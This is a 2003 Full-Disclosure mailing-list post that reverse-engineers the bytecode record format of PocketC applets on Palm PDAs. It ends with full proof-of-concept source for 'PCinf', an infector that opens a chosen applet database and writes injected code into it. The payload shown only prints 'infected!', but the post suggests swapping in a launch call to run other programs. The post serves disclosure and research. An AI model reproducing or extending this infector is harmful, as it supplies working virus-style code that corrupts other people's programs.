[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-Disclosure] playing pocketc...
- To: full-disclosure@xxxxxxxxxxxxxxxx
- Subject: [Full-Disclosure] playing pocketc...
- From: qobaiashi@xxxxxxx
- Date: Fri, 12 Sep 2003 14:21:27 +0200 (MEST)
file attached...
--
COMPUTERBILD 15/03: Premium-e-mail-Dienste im Test
--------------------------------------------------
1. GMX TopMail - Platz 1 und Testsieger!
2. GMX ProMail - Platz 2 und Preis-Qualitätssieger!
3. Arcor - 4. web.de - 5. T-Online - 6. freenet.de - 7. daybyday - 8. e-Post
hi there!
the following is about palm pdas+pocketc so if you're not interested stop here
-->.<--
this is dedicated to all who play around on their palm while waiting for the
subway :)
what exactly are you trying to tell us ?
========================================
i wanted to write an infector for pocketc applets..and that's what i found out.
what is PocketC ?
==================
PocketC provides a way to write and compile c code directly on
a palm pda. compilation does not produce independent programs
but a kind of applets which are executed via the pocketc
virtual machine (PCvm). after compilation a database is created
which contains 4 records named #0 to #4.
#0 - contains code
#1 - additional stuff (honestly i have no idea)
#2 - static strings, function names
#3 - same as #1
a closer look to #0
===================
at first there is some code which holds some information about the applet
(i think). for example the first 2 bytes hold the size of record #0 - 2.
which limits the possible size to 0xffff bytes ;). imho this is not that
important. in any case in my examples the first 28 bytes (mostly followed
by a NULL) are quite similar in all applets. next to that are functions
followed by function main. on simple applets the last 9 bytes are mostly
the same (or similar). observation: imho all sub functions end with a 0x2c
could be smth like the well known int $0x80..dunno.
a closer look to #2
===================
the first 6 bytes are again smth like a header..nothing useful except for
the first 2 bytes which again hold the recordsize-2. at offset 7 the strings
start. right before a string is a byte which contains the strlen of the
string followed by a NULL. thus the end of the record is a NULL.
extracted code snips
====================
// exits to app launcher
exit() - "\x28\x70\2c";
// prints smth from #2
// byte 3 points on the string:
// points on the null byte before a string entry
puts() - "\x03\x00\x??\x07\x28\x01\x2c";
// launches a proggie named in #2
// works as puts() does..
launch() - "\x03\x00\x??\x07\x28\x58\x2c";
// ret
// i'm not sure about that one at least it is the end
// of main in simple applets. other func()'s return similar
// perhaps this one works for them, too
ret - "\x2b\x2f\x29";
// code to reserve a string variable (at least i think so..)
// 0x?? = size
"\x33\x00\x??\x0c\x03\x00\x00\x2b\x2d\x00\x??";
i do not yet know how more complex functions work so...
this is enough information to write a little infector which
injects simple code into a victim applet. oh by the way
this code seems to be pic ;).
all this was done using version 6.0 of pocketc.
POC:
====
// PCinf.c
/*
this is a simple code infector
for pocketc running on palm
compatible hardware.
it injects a string printing
code.
you can also use the launch()
code and exec eg. "memo"..
unpleasant side effects:
*atm the applet gets "unusable"
for its normal purpose :>
*bigger applets crash due to
this buggy "ret" thingie..
by qobaiashi
*/
#define LOCATION 0x1d
main()
{
string name,
code[11] =
{"\x03\x90\x05\x07\x28\x01
\x2c\x2b\x2f\x29\x00"};
msg[12] =
// 1st byte = strlen!
{"\x0ainfected!\n\x00"};
int dbcntr = 0, cntr, record, size,
r2size;
char patch;
pointer ptr;
clear();
puts(" ---PCinf--- \n");
puts(" PocketC \n");
puts(" infector \n");
puts(" by qobaiashi\n\n");
name = gets("Applet to infect:");
if (strlen(name) == 0)
{
puts("[!] i need a victim..\n");
launch("PktC");
}
puts("[*] using applet: "+name+
"\n");
// opening said database
dbopen(name);
//---string infector section---\\
//write a string into #2
// set record number:
record = 0;
dbrec(record);
dbcntr = dbsize();
r2size = dbcntr;// for patching..
puts("using record "+record+"\n");
puts("record size = "+dbcntr+"\n";
// set offset in current record
dbseek(dbcntr);
puts("location is "+dbpos()+"\n\n");
size = strlen(msg);
ptr = msg+size;
dbwritex(ptr, 'c');
ptr = msg;
dbwritex(ptr, 'ssize');
//---code infector section---\\
// set record number
record = 0;
dbcntr = dbsize();
puts("using record "+record+"\n");
puts("record size = "+dbcntr"\n");
// set offset in current record
dbseek(LOCATION);
puts("location is "+dbpos()+"\n\n");
// write out hostile code
ptr = code;
dbwritex(ptr, 'ssize');
// patch 0x00 into code
ptr = code + size;
dbseek(LOCATION+1);
dbwritex(ptr, 'c');
// patch string offset in #2 into code
dbseek(LOCATION+2);
patch = r2size;
dbwritex(&patch, 'c');
dbclose();
}